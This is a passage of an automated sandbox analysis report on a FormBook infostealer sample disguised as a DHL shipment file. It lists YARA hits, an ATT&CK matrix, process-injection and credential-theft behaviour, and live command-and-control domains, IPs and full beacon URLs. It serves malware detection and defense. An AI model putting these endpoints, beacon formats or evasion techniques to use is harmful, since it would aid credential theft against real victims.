            Source: rDHL8350232025-2.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte64HKEY_LOCAL_MACHINEHKLMHKEY_CLASSES_ROOTHKCRHKEY_CURRENT_CONFIGHKCCHKEY_CURRENT_USERHKCUHKEY_USERSHKUREG_EXPAND_SZREG_SZREG_MULTI_SZREG_DWORDREG_QWORDREG_BINARYRegDeleteKeyExWadvapi32.dll+.-.\\[\\nrt]|%%|%[-+ 0#]?([0-9]*|\*)?(\.[0-9]*|\.\*)?[hlL]?[diouxXeEfgGs](*UCP)\XISVISIBLEISENABLEDTABLEFTTABRIGHTCURRENTTABSHOWDROPDOWNHIDEDROPDOWNADDSTRINGDELSTRINGFINDSTRINGGETCOUNTSETCURRENTSELECTIONGETCURRENTSELECTIONSELECTSTRINGISCHECKEDCHECKUNCHECKGETSELECTEDGETLINECOUNTGETCURRENTLINEGETCURRENTCOLEDITPASTEGETLINESENDCOMMANDIDGETITEMCOUNTGETSUBITEMCOUNTGETTEXTGETSELECTEDCOUNTISSELECTEDSELECTALLSELECTCLEARSELECTINVERTDESELECTFINDITEMVIEWCHANGEGETTOTALCOUNTCOLLAPSEEXPANDmsctls_statusbar321tooltips_class32%d/%02d/%02dbuttonComboboxListboxSysDateTimePick32SysMonthCal32.icl.exe.dllMsctls_Progress32msctls_trackbar32SysAnimate32msctls_updown32SysTabControl32SysTreeView32SysListView32-----@GUI_DRAGID@GUI_DROPID@GUI_DRAGFILEError text not found (please report)Q\EDEFINEUTF16)UTF)UCP)NO_AUTO_POSSESS)NO_START_OPT)LIMIT_MATCH=LIMIT_RECURSION=CR)LF)CRLF)ANY)ANYCRLF)BSR_ANYCRLF)BSR_UNICODE)argument is not a compiled regular expressionargument not compiled in 16 bit modeinternal error: opcode not recognizedinternal error: missing capturing bracketfailed to get memory
            Source: rDHL8350232025-2.exeBinary or memory string: WIN_XPe
            Source: rDHL8350232025-2.exeBinary or memory string: WIN_VISTA
            Source: rDHL8350232025-2.exeBinary or memory string: WIN_7
            Source: rDHL8350232025-2.exeBinary or memory string: WIN_8

            Remote Access Functionality

            barindex
            Yara detected FormBook
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
            Source: Yara matchFile source: 00000002.00000002.2148926419.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000006.00000002.4464152837.0000000005210000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462269594.00000000007E0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000003.00000002.4462305414.0000000003780000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4461185601.0000000000450000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2149589488.0000000003950000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000002.00000002.2149639363.0000000004390000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
            Source: Yara matchFile source: 00000004.00000002.4462330271.0000000000820000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000B1204 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_000B1204
            Source: C:\Users\user\Desktop\rDHL8350232025-2.exeCode function: 0_2_000B1806 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_000B1806

            Mitre Att&ck Matrix

            ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
            Gather Victim Identity InformationAcquire Infrastructure2
            Valid Accounts            		1
            Native API            		1
            DLL Side-Loading            		1
            Exploitation for Privilege Escalation            		1
            Disable or Modify Tools            		1
            OS Credential Dumping            		2
            System Time Discovery            		Remote Services1
            Archive Collected Data            		4
            Ingress Tool Transfer            		Exfiltration Over Other Network Medium1
            System Shutdown/Reboot
            CredentialsDomainsDefault AccountsScheduled Task/Job2
            Valid Accounts            		1
            Abuse Elevation Control Mechanism            		1
            Deobfuscate/Decode Files or Information            		21
            Input Capture            		1
            Account Discovery            		Remote Desktop Protocol1
            Data from Local System            		1
            Encrypted Channel            		Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
            DLL Side-Loading            		1
            Abuse Elevation Control Mechanism            		Security Account Manager2
            File and Directory Discovery            		SMB/Windows Admin Shares1
            Email Collection            		4
            Non-Application Layer Protocol            		Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook2
            Valid Accounts            		3
            Obfuscated Files or Information            		NTDS116
            System Information Discovery            		Distributed Component Object Model21
            Input Capture            		4
            Application Layer Protocol            		Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script21
            Access Token Manipulation            		1
            DLL Side-Loading            		LSA Secrets241
            Security Software Discovery            		SSH3
            Clipboard Data            		Fallback ChannelsScheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts412
            Process Injection            		2
            Valid Accounts            		Cached Domain Credentials12
            Virtualization/Sandbox Evasion            		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items12
            Virtualization/Sandbox Evasion            		DCSync3
            Process Discovery            		Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job21
            Access Token Manipulation            		Proc Filesystem11
            Application Window Discovery            		Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt412
            Process Injection            		/etc/passwd and /etc/shadow1
            System Owner/User Discovery            		Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

            Behavior Graph

            Hide Legend

            Legend:

            • Process
            • Signature
            • Created File
            • DNS/IP Info
            • Is Dropped
            • Is Windows Process
            • Number of created Registry Values
            • Number of created Files
            • Visual Basic
            • Delphi
            • Java
            • .Net C# or VB.NET
            • C, C++ or other language
            • Is malicious
            • Internet
            behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1585371 Sample: rDHL8350232025-2.exe Startdate: 07/01/2025 Architecture: WINDOWS Score: 100 28 www.joyesi.xyz 2->28 30 www.techchains.info 2->30 32 17 other IPs or domains 2->32 42 Suricata IDS alerts for network traffic 2->42 44 Malicious sample detected (through community Yara rule) 2->44 46 Antivirus detection for URL or domain 2->46 50 6 other signatures 2->50 10 rDHL8350232025-2.exe 1 2->10         started        signatures3 48 Performs DNS queries to domains with low reputation 28->48 process4 signatures5 62 Binary is likely a compiled AutoIt script file 10->62 64 Found API chain indicative of sandbox detection 10->64 66 Writes to foreign memory regions 10->66 68 2 other signatures 10->68 13 svchost.exe 10->13         started        process6 signatures7 70 Maps a DLL or memory area into another process 13->70 16 qSVRmrwLYsrJTsNjTGrEW.exe 13->16 injected process8 signatures9 40 Found direct / indirect Syscall (likely to bypass EDR) 16->40 19 netbtugc.exe 13 16->19         started        process10 signatures11 52 Tries to steal Mail credentials (via file / registry access) 19->52 54 Tries to harvest and steal browser information (history, passwords, etc) 19->54 56 Modifies the context of a thread in another process (thread injection) 19->56 58 3 other signatures 19->58 22 qSVRmrwLYsrJTsNjTGrEW.exe 19->22 injected 26 firefox.exe 19->26         started        process12 dnsIp13 34 www.rssnewscast.com 91.195.240.94, 49985, 49986, 49987 SEDO-ASDE Germany 22->34 36 www.3xfootball.com 154.215.72.110, 49736, 80 POWERLINE-AS-APPOWERLINEDATACENTERHK Seychelles 22->36 38 5 other IPs or domains 22->38 60 Found direct / indirect Syscall (likely to bypass EDR) 22->60 signatures14

            Screenshots

            Thumbnails

            This section contains all screenshots as thumbnails, including those not shown in the slideshow.


            windows-stand

            Antivirus, Machine Learning and Genetic Malware Detection

            Initial Sample

            SourceDetectionScannerLabelLink
            rDHL8350232025-2.exe53%ReversingLabsWin32.Backdoor.FormBook
            rDHL8350232025-2.exe100%AviraDR/AutoIt.Gen8
            rDHL8350232025-2.exe100%Joe Sandbox ML

            Dropped Files

            No Antivirus matches

            Unpacked PE Files

            No Antivirus matches

            Domains

            No Antivirus matches

            URLs

            SourceDetectionScannerLabelLink
            https://www.empowermedeco.com/fo8o/?FPJps=mxnR0%Avira URL Cloudsafe
            http://www.empowermedeco.com0%Avira URL Cloudsafe
            http://www.empowermedeco.com/fo8o/?FPJps=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&vVyTz=x4ZDmHH00%Avira URL Cloudsafe
            http://www.techchains.info/fo8o/100%Avira URL Cloudmalware
            http://www.3xfootball.com/fo8o/?vVyTz=x4ZDmHH0&FPJps=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==0%Avira URL Cloudsafe
            http://www.rssnewscast.com/fo8o/?FPJps=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&vVyTz=x4ZDmHH0100%Avira URL Cloudmalware
            http://www.magmadokum.com/fo8o/?vVyTz=x4ZDmHH0&FPJps=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==0%Avira URL Cloudsafe
            http://www.goldenjade-travel.com/fo8o/?vVyTz=x4ZDmHH0&FPJps=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==100%Avira URL Cloudmalware
            http://www.elettrosistemista.zip/fo8o/?vVyTz=x4ZDmHH0&FPJps=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==100%Avira URL Cloudmalware

            Domains and IPs

            Contacted Domains

            NameIPActiveMaliciousAntivirus DetectionReputation
            elettrosistemista.zip
            		195.110.124.133
            		truefalse
              		high
              empowermedeco.com
              		217.196.55.202
              		truefalse
                		high
                www.3xfootball.com
                		154.215.72.110
                		truetrue
                  		unknown
                  www.goldenjade-travel.com
                  		116.50.37.244
                  		truefalse
                    		high
                    www.rssnewscast.com
                    		91.195.240.94
                    		truetrue
                      		unknown
                      www.techchains.info
                      		66.29.149.46
                      		truetrue
                        		unknown
                        natroredirect.natrocdn.com
                        		85.159.66.93
                        		truefalse
                          		high
                          www.magmadokum.com
                          		unknown
                          		unknowntrue
                            		unknown
                            www.donnavariedades.com
                            		unknown
                            		unknownfalse
                              		high
                              www.660danm.top
                              		unknown
                              		unknowntrue
                                		unknown
                                www.joyesi.xyz
                                		unknown
                                		unknownfalse
                                  		high
                                  www.liangyuen528.com
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.kasegitai.tokyo
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.empowermedeco.com
                                      		unknown
                                      		unknownfalse
                                        		high
                                        www.k9vyp11no3.cfd
                                        		unknown
                                        		unknowntrue
                                          		unknown
                                          www.elettrosistemista.zip
                                          		unknown
                                          		unknownfalse
                                            		high
                                            www.shenzhoucui.com
                                            		unknown
                                            		unknowntrue
                                              		unknown
                                              www.antonio-vivaldi.mobi
                                              		unknown
                                              		unknowntrue
                                                		unknown

                                                Contacted URLs

                                                NameMaliciousAntivirus DetectionReputation
                                                http://www.empowermedeco.com/fo8o/false
                                                  		high
                                                  http://www.elettrosistemista.zip/fo8o/false
                                                    		high
                                                    http://www.empowermedeco.com/fo8o/?FPJps=mxnR+iHPFb8HZiaBBOLBDF0OC7azb6MRPLEBGwFodGelSqoCQiBwPqu0WU7djgVoJgj4cKk6Pp6Q/yIaSghKZS1b6NbCHbQEZbfQfUSvJErRJZB76jwKK/37UG0r+NzcRQ==&vVyTz=x4ZDmHH0true
                                                    • Avira URL Cloud: safe
                                                    		unknown
                                                    http://www.magmadokum.com/fo8o/false
                                                      		high
                                                      http://www.rssnewscast.com/fo8o/?FPJps=x3jV/ECx7FuzXOI5niBKCyXhuUkTi7THyCIVaqWvGMMqpfz0YC5wLsL1wYxwFH1KuInYTmXKqKNNujOvwtdNo7YSnSe3b06z1hRjejs3ag7OBngOhxFR5lEHJntjOPFYJw==&vVyTz=x4ZDmHH0true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.goldenjade-travel.com/fo8o/?vVyTz=x4ZDmHH0&FPJps=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwgsmgn0tjJUfda6vPucKXgoaEer/I3bJmMi6r+vCyLgXuQ==true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.elettrosistemista.zip/fo8o/?vVyTz=x4ZDmHH0&FPJps=bO1UBvtoHFNUmlWGmXL3o3L5Dhw+Vy81qF418M7UHpKKa2cgLZsmM/SsbGGojtls67Xc6OgTo57aJm1+bsxMNglie/alwGrbjt4sQOb9JZJseQvAkmnJhBfN0CPURydTcQ==true
                                                      • Avira URL Cloud: malware
                                                      		unknown
                                                      http://www.3xfootball.com/fo8o/?vVyTz=x4ZDmHH0&FPJps=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzIiuR4u4IIkzi3Kqqtd6zR7shSxwh28NyLEf3/mFmUyU2g==true
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.rssnewscast.com/fo8o/false
                                                        		high
                                                        http://www.magmadokum.com/fo8o/?vVyTz=x4ZDmHH0&FPJps=qL3nKp+YSjoaTomgQjyPoknaJzFflnvGMW8DXsDTZ4AADrD7Wpn1i04piMS1+AOWgCBMohpgbh6Cuut9PSzjMWAnWKRmrKgMQiWi7WA8E0wwbeEcZziILA/VBeUyRYh4cA==true
                                                        • Avira URL Cloud: safe
                                                        		unknown
                                                        http://www.goldenjade-travel.com/fo8o/false
                                                          		high
                                                          http://www.techchains.info/fo8o/true
                                                          • Avira URL Cloud: malware
                                                          		unknown

                                                          URLs from Memory and Binaries

                                                          NameSourceMaliciousAntivirus DetectionReputation
                                                          https://duckduckgo.com/chrome_newtabnetbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                            		high
                                                            https://duckduckgo.com/ac/?q=netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                              		high
                                                              https://www.google.com/images/branding/product/ico/googleg_lodp.iconetbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                		high
                                                                https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                    		high
                                                                    http://www.empowermedeco.comqSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4464152837.0000000005281000.00000040.80000000.00040000.00000000.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		unknown
                                                                    https://www.ecosia.org/newtab/netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.name.com/domain/renew/rssnewscast.com?utm_source=Sedo_parked_page&utm_medium=button&utm_netbtugc.exe, 00000004.00000002.4464718266.00000000059F0000.00000004.00000800.00020000.00000000.sdmp, netbtugc.exe, 00000004.00000002.4463074784.0000000003F9E000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.000000000399E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                        		high
                                                                        https://www.sedo.com/services/parking.php3qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.000000000399E000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ac.ecosia.org/autocomplete?q=netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            https://www.empowermedeco.com/fo8o/?FPJps=mxnRnetbtugc.exe, 00000004.00000002.4463074784.000000000490A000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.000000000430A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            • Avira URL Cloud: safe
                                                                            		unknown
                                                                            https://codepen.io/uzcho_/pens/popular/?grid_type=listnetbtugc.exe, 00000004.00000002.4463074784.00000000042C2000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000003CC2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                              		high
                                                                              https://codepen.io/uzcho_/pen/eYdmdXw.cssnetbtugc.exe, 00000004.00000002.4463074784.00000000042C2000.00000004.10000000.00040000.00000000.sdmp, qSVRmrwLYsrJTsNjTGrEW.exe, 00000006.00000002.4462504039.0000000003CC2000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                		high
                                                                                https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchnetbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                  		high
                                                                                  https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=netbtugc.exe, 00000004.00000003.2338095377.00000000074DD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                    		high

                                                                                    World Map of Contacted IPs

                                                                                    • No. of IPs < 25%
                                                                                    • 25% < No. of IPs < 50%
                                                                                    • 50% < No. of IPs < 75%
                                                                                    • 75% < No. of IPs

                                                                                    Public IPs

                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                    91.195.240.94
                                                                                    		www.rssnewscast.comGermany
                                                                                    		47846SEDO-ASDEtrue
                                                                                    154.215.72.110
                                                                                    		www.3xfootball.comSeychelles
                                                                                    		132839POWERLINE-AS-APPOWERLINEDATACENTERHKtrue
                                                                                    195.110.124.133
                                                                                    		elettrosistemista.zipItaly
                                                                                    		39729REGISTER-ASITfalse
                                                                                    116.50.37.244
                                                                                    		www.goldenjade-travel.comTaiwan; Republic of China (ROC)
                                                                                    		18046DONGFONG-TWDongFongTechnologyCoLtdTWfalse
                                                                                    85.159.66.93
                                                                                    		natroredirect.natrocdn.comTurkey
                                                                                    		34619CIZGITRfalse
                                                                                    66.29.149.46
                                                                                    		www.techchains.infoUnited States
                                                                                    		19538ADVANTAGECOMUStrue
                                                                                    217.196.55.202
                                                                                    		empowermedeco.comNorway
                                                                                    		29300AS-DIRECTCONNECTNOfalse

                                                                                    General Information

                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                    Analysis ID:1585371
                                                                                    Start date and time:2025-01-07 15:31:08 +01:00
                                                                                    Joe Sandbox product:CloudBasic
                                                                                    Overall analysis duration:0h 10m 32s
                                                                                    Hypervisor based Inspection enabled:false
                                                                                    Report type:full
                                                                                    Cookbook file name:default.jbs
                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                    Number of analysed new started processes analysed:7
                                                                                    Number of new started drivers analysed:0
                                                                                    Number of existing processes analysed:0
                                                                                    Number of existing drivers analysed:0
                                                                                    Number of injected processes analysed:2
                                                                                    Technologies:
                                                                                    • HCA enabled
                                                                                    • EGA enabled
                                                                                    • AMSI enabled
                                                                                    Analysis Mode:default
                                                                                    Analysis stop reason:Timeout
                                                                                    Sample name:rDHL8350232025-2.exe
                                                                                    Detection:MAL
                                                                                    Classification:mal100.troj.spyw.evad.winEXE@7/2@15/7
                                                                                    EGA Information:
                                                                                    • Successful, ratio: 75%
                                                                                    HCA Information:
                                                                                    • Successful, ratio: 95%
                                                                                    • Number of executed functions: 42
                                                                                    • Number of non-executed functions: 313
                                                                                    Cookbook Comments:
                                                                                    • Found application associated with file extension: .exe
                                                                                    • Override analysis time to 240000 for current running targets taking high CPU consumption

                                                                                    Warnings

                                                                                    • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                    • Excluded IPs from analysis (whitelisted): 4.175.87.197, 13.107.246.45
                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                    • Execution Graph export aborted for target qSVRmrwLYsrJTsNjTGrEW.exe, PID 3576 because it is empty
                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                    • Report size exceeded maximum capacity and may have missing disassembly code.
                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                    • VT rate limit hit for: rDHL8350232025-2.exe

                                                                                    Simulations

                                                                                    Behavior and APIs

                                                                                    TimeTypeDescription
                                                                                    09:32:46API Interceptor11444415x Sleep call for process: netbtugc.exe modified

                                                                                    Joe Sandbox View / Context

                                                                                    IPs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    91.195.240.94DHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    236236236.elfGet hashmaliciousUnknownBrowse
                                                                                    • suboyule.736t.com/
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.rssnewscast.com/fo8o/
                                                                                    154.215.72.110wOoESPII08.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.3xfootball.com/fo8o/?xVY=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnj6KtR967KJkZjHO4n68kz2fsmRVZ8Q==&Nz=LPhpDRap3
                                                                                    N2sgk6jMa2.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.3xfootball.com/fo8o/?qD=FrMTb&aZ=IhZyPQIGe6uK3zPwzgZotr9BPg6ZX3xlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOn1bCAV966J7ZkoXS5ptBuz2edhBZoh3xN24c=
                                                                                    Document 151-512024.exeGet hashmaliciousFormBookBrowse
                                                                                    • www.3xfootball.com/fo8o/?4h8=YPQX8Tch&FBEd=IhZyPQIGe6uK3zP3twZWsYVeSSeNS0ZlW2eS79Xk6ut4afzj0LiRBEeFtQixSzG192fRs1GD25A478p7nOOnzPSqftK5Z9AZjHO4n69vlG+dhBZ38Q==

                                                                                    Domains

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    www.3xfootball.comDHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    www.goldenjade-travel.comDHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    CCE 30411252024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    Certificate 11-18720.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244
                                                                                    Certificate 11-19AIS.exeGet hashmaliciousFormBookBrowse
                                                                                    • 116.50.37.244

                                                                                    ASNs

                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                    POWERLINE-AS-APPOWERLINEDATACENTERHKDHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    i686.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.244.6.20
                                                                                    z0r0.spc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.242.206.56
                                                                                    i686.elfGet hashmaliciousMiraiBrowse
                                                                                    • 156.244.6.20
                                                                                    3.elfGet hashmaliciousUnknownBrowse
                                                                                    • 154.89.139.24
                                                                                    PKHDJwnF0I.exeGet hashmaliciousGhostRatBrowse
                                                                                    • 156.251.17.243
                                                                                    8R2YjBA8nI.exeGet hashmaliciousGhostRatBrowse
                                                                                    • 156.251.17.243
                                                                                    Hilix.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                    • 45.202.220.139
                                                                                    Hilix.sh4.elfGet hashmaliciousMiraiBrowse
                                                                                    • 45.202.220.141
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 154.215.72.110
                                                                                    REGISTER-ASITDHL 8350232025-1.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 745-12302024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 806-232024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 0737-12182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 073412182024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 40312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    DHL 30312052024.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
                                                                                    SRT68.exeGet hashmaliciousFormBookBrowse
                                                                                    • 195.110.124.133
